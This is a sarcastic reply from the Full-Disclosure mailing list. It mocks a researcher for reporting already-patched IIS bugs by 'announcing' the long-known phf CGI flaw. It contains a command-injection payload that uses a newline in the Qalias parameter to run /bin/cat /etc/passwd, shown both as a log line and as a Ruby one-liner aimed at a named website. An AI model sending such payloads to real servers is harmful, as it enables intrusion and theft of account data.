Full Disclosure: Re: Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin

[Григорий Братислава <musntlive () gmail com>]

On Tue, Jul 17, 2012 at 10:11 AM, king cope
<isowarez.isowarez.isowarez () googlemail com> wrote:
> Hello Jan,
> I did some additional tests for the IIS bugs.
>
> * IIS 6.0 PHP authentication bypass is only possible on Windows Server
> 2003 SP1. SP2 seems unaffected
>   So take that bug as resolved, my mistake as I didn't have a fully
> patched system online when testing.
kingcope are we is release advisories to patched software? Is so, then
I introduce exploit along with you.

Hello full disclosure!! !! !!

Is like to warn you about phf vulnerability. Is hackers can get your
password list in is unpatched server.

PoC on is my system:

213.24.76.77 - - [17/July/2012:23:17:47 -0700] "GET
/cgi-bin/phf?Qalias=3Dx%0a/bin/cat%20/etc/passwd HTTP/1.0" 500 -

In Ruby (here we is own rsnake):

require 'open-uri'
open('http://www.webfringe.org/cgi-bin/phf?Qalias=3Dx%0a/bin/cat%20/etc/passwd
HTTP/1.0'){ |f| print f.read }

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/